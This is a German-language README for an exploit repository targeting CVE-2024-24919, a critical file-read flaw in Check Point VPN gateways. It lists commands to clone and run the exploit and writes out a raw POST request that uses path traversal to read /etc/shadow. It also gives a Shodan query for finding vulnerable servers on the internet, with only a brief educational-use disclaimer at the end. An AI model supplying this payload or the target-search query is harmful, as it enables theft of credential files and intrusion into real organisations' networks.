
CVE-2024-24919 Exploit und PoC - Kritischer LFI für Remote Access VPN oder Mobile Access.
Dieses Repository enthält einen Python-Exploit für CVE-2024-24919, eine Schwachstelle, die es ermöglicht, sensible Dateien von der verwundbaren Seite auszulesen.
Dieser Exploit prüft zunächst, ob das Ziel verwundbar ist, und ruft dann den von Ihnen angegebenen Pfad ab.
Schweregrad: Kritisch
Klonen Sie zunächst das Repository:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Geben Sie Berechtigungen und führen Sie den Exploit mit Python3 aus:
chmod +x exploit.py
python3 exploit.py
Folgen Sie dann den Schritten und Sie erhalten die Daten der von Ihnen angegebenen Datei.
Wenn Sie Probleme haben, stellen Sie sicher, dass die von Ihnen angegebene URL die Haupt-URL ist:
✓ https://google.com
✘ https://google.com/search?client=firefox
Zuerst müssen wir sicherstellen, dass die Website über Check Point Security Gateways verfügt, für die Remote Access VPN oder Mobile Access Software aktiviert ist.
In diesem Exploit zeigen wir auf den Endpunkt {ip}/clients/MyCRL.
Dieser Endpunkt ist anfällig, wenn wir eine POST-Anfrage senden, den String CSHELL/ und den Pfad der Datei hinzufügen, die wir mittels Path Traversal lesen möchten.
Die Anfrage sieht etwa so aus:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
All dies haben wir durch Analyse des Quellcodes ermittelt.
Weitere Informationen zum Vorgang finden Sie in diesem Beitrag: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Wenn Sie diese Schwachstelle testen möchten, können Sie Sodan verwenden, um anfällige Websites zu finden – mit dieser Abfrage in Sodan:
Server: "Check Point SVN Foundation"
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Dieses Skript dient ausschließlich zu Bildungszwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie eine Zugriffsberechtigung haben.